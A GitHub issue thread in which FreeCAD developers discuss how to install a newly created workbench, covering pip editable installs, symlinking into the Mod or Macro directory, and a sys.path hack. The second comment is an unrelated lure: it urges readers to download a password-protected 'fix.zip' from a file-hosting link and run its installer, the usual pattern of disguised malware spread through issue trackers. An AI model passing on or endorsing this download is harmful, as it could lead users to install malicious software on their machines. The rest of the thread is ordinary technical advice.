FreeCAD/freecad.workbench_starterkit #21: How do you install a workbench once it's created?

ToddG, 2024-08-26:
The README is not specific w/respect to installing via pip... or in fact, how a developer is supposed to move from creating the workbench to actually installing, developing, and testing it in FC... the critical step is installing into FC..

1. How do you determine which python FC is using? For example, when I look in the python console, it seems that python is part of the FC executable. If that's the case, then how do we `pip install` the workbench into this? 

```
Python 3.10.12 (main, Mar 22 2024, 16:50:05) [GCC 11.4.0] on linux
Type 'help', 'copyright', 'credits' or 'license' for more information.
>>> # Gui.runCommand('Std_Workbench',10)
>>> # Gui.runCommand('Std_ViewStatusBar',1)
>>> import sys
>>> print(sys.executable)
/media/toddg/data1/repos/forked/freecad-source/build/bin/FreeCAD
```

2. Someone mentioned simply softlinking into the Mod directory... I'll try that.

pilot5657, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

looooo, 2024-08-26:
it depends on how freecad is installed. If freecad is installed via a package-manager (conda, apt, ...) you can install a workbench with: `pip install -e .` which will link the directory.
Not sure how it works if you have freecad installed via bundle (appimage, dmg, ...)

morganrallen, 2025-04-22:
During development, I symlink my working directory into the FreeCAD Macro directory.

something like....
`~/.local/share/FreeCAD/Macro/test_wb > ~/devel/test_wb`

And because I have external dependencies and am pre-release, I hack in the path for my `virtualenv` dependencies.

```
# temp hack to run kipy from source until 0.1.0 is looking ~
sys.path.insert(1, os.path.join(os.path.dirname(os.path.realpath(__file__)), '..', '..', '.venv', 'lib', 'python3.13', 'site-packages'))
```

Not saying this is the 'right way', but has been working for me.

closed 2026-01-20 by chennes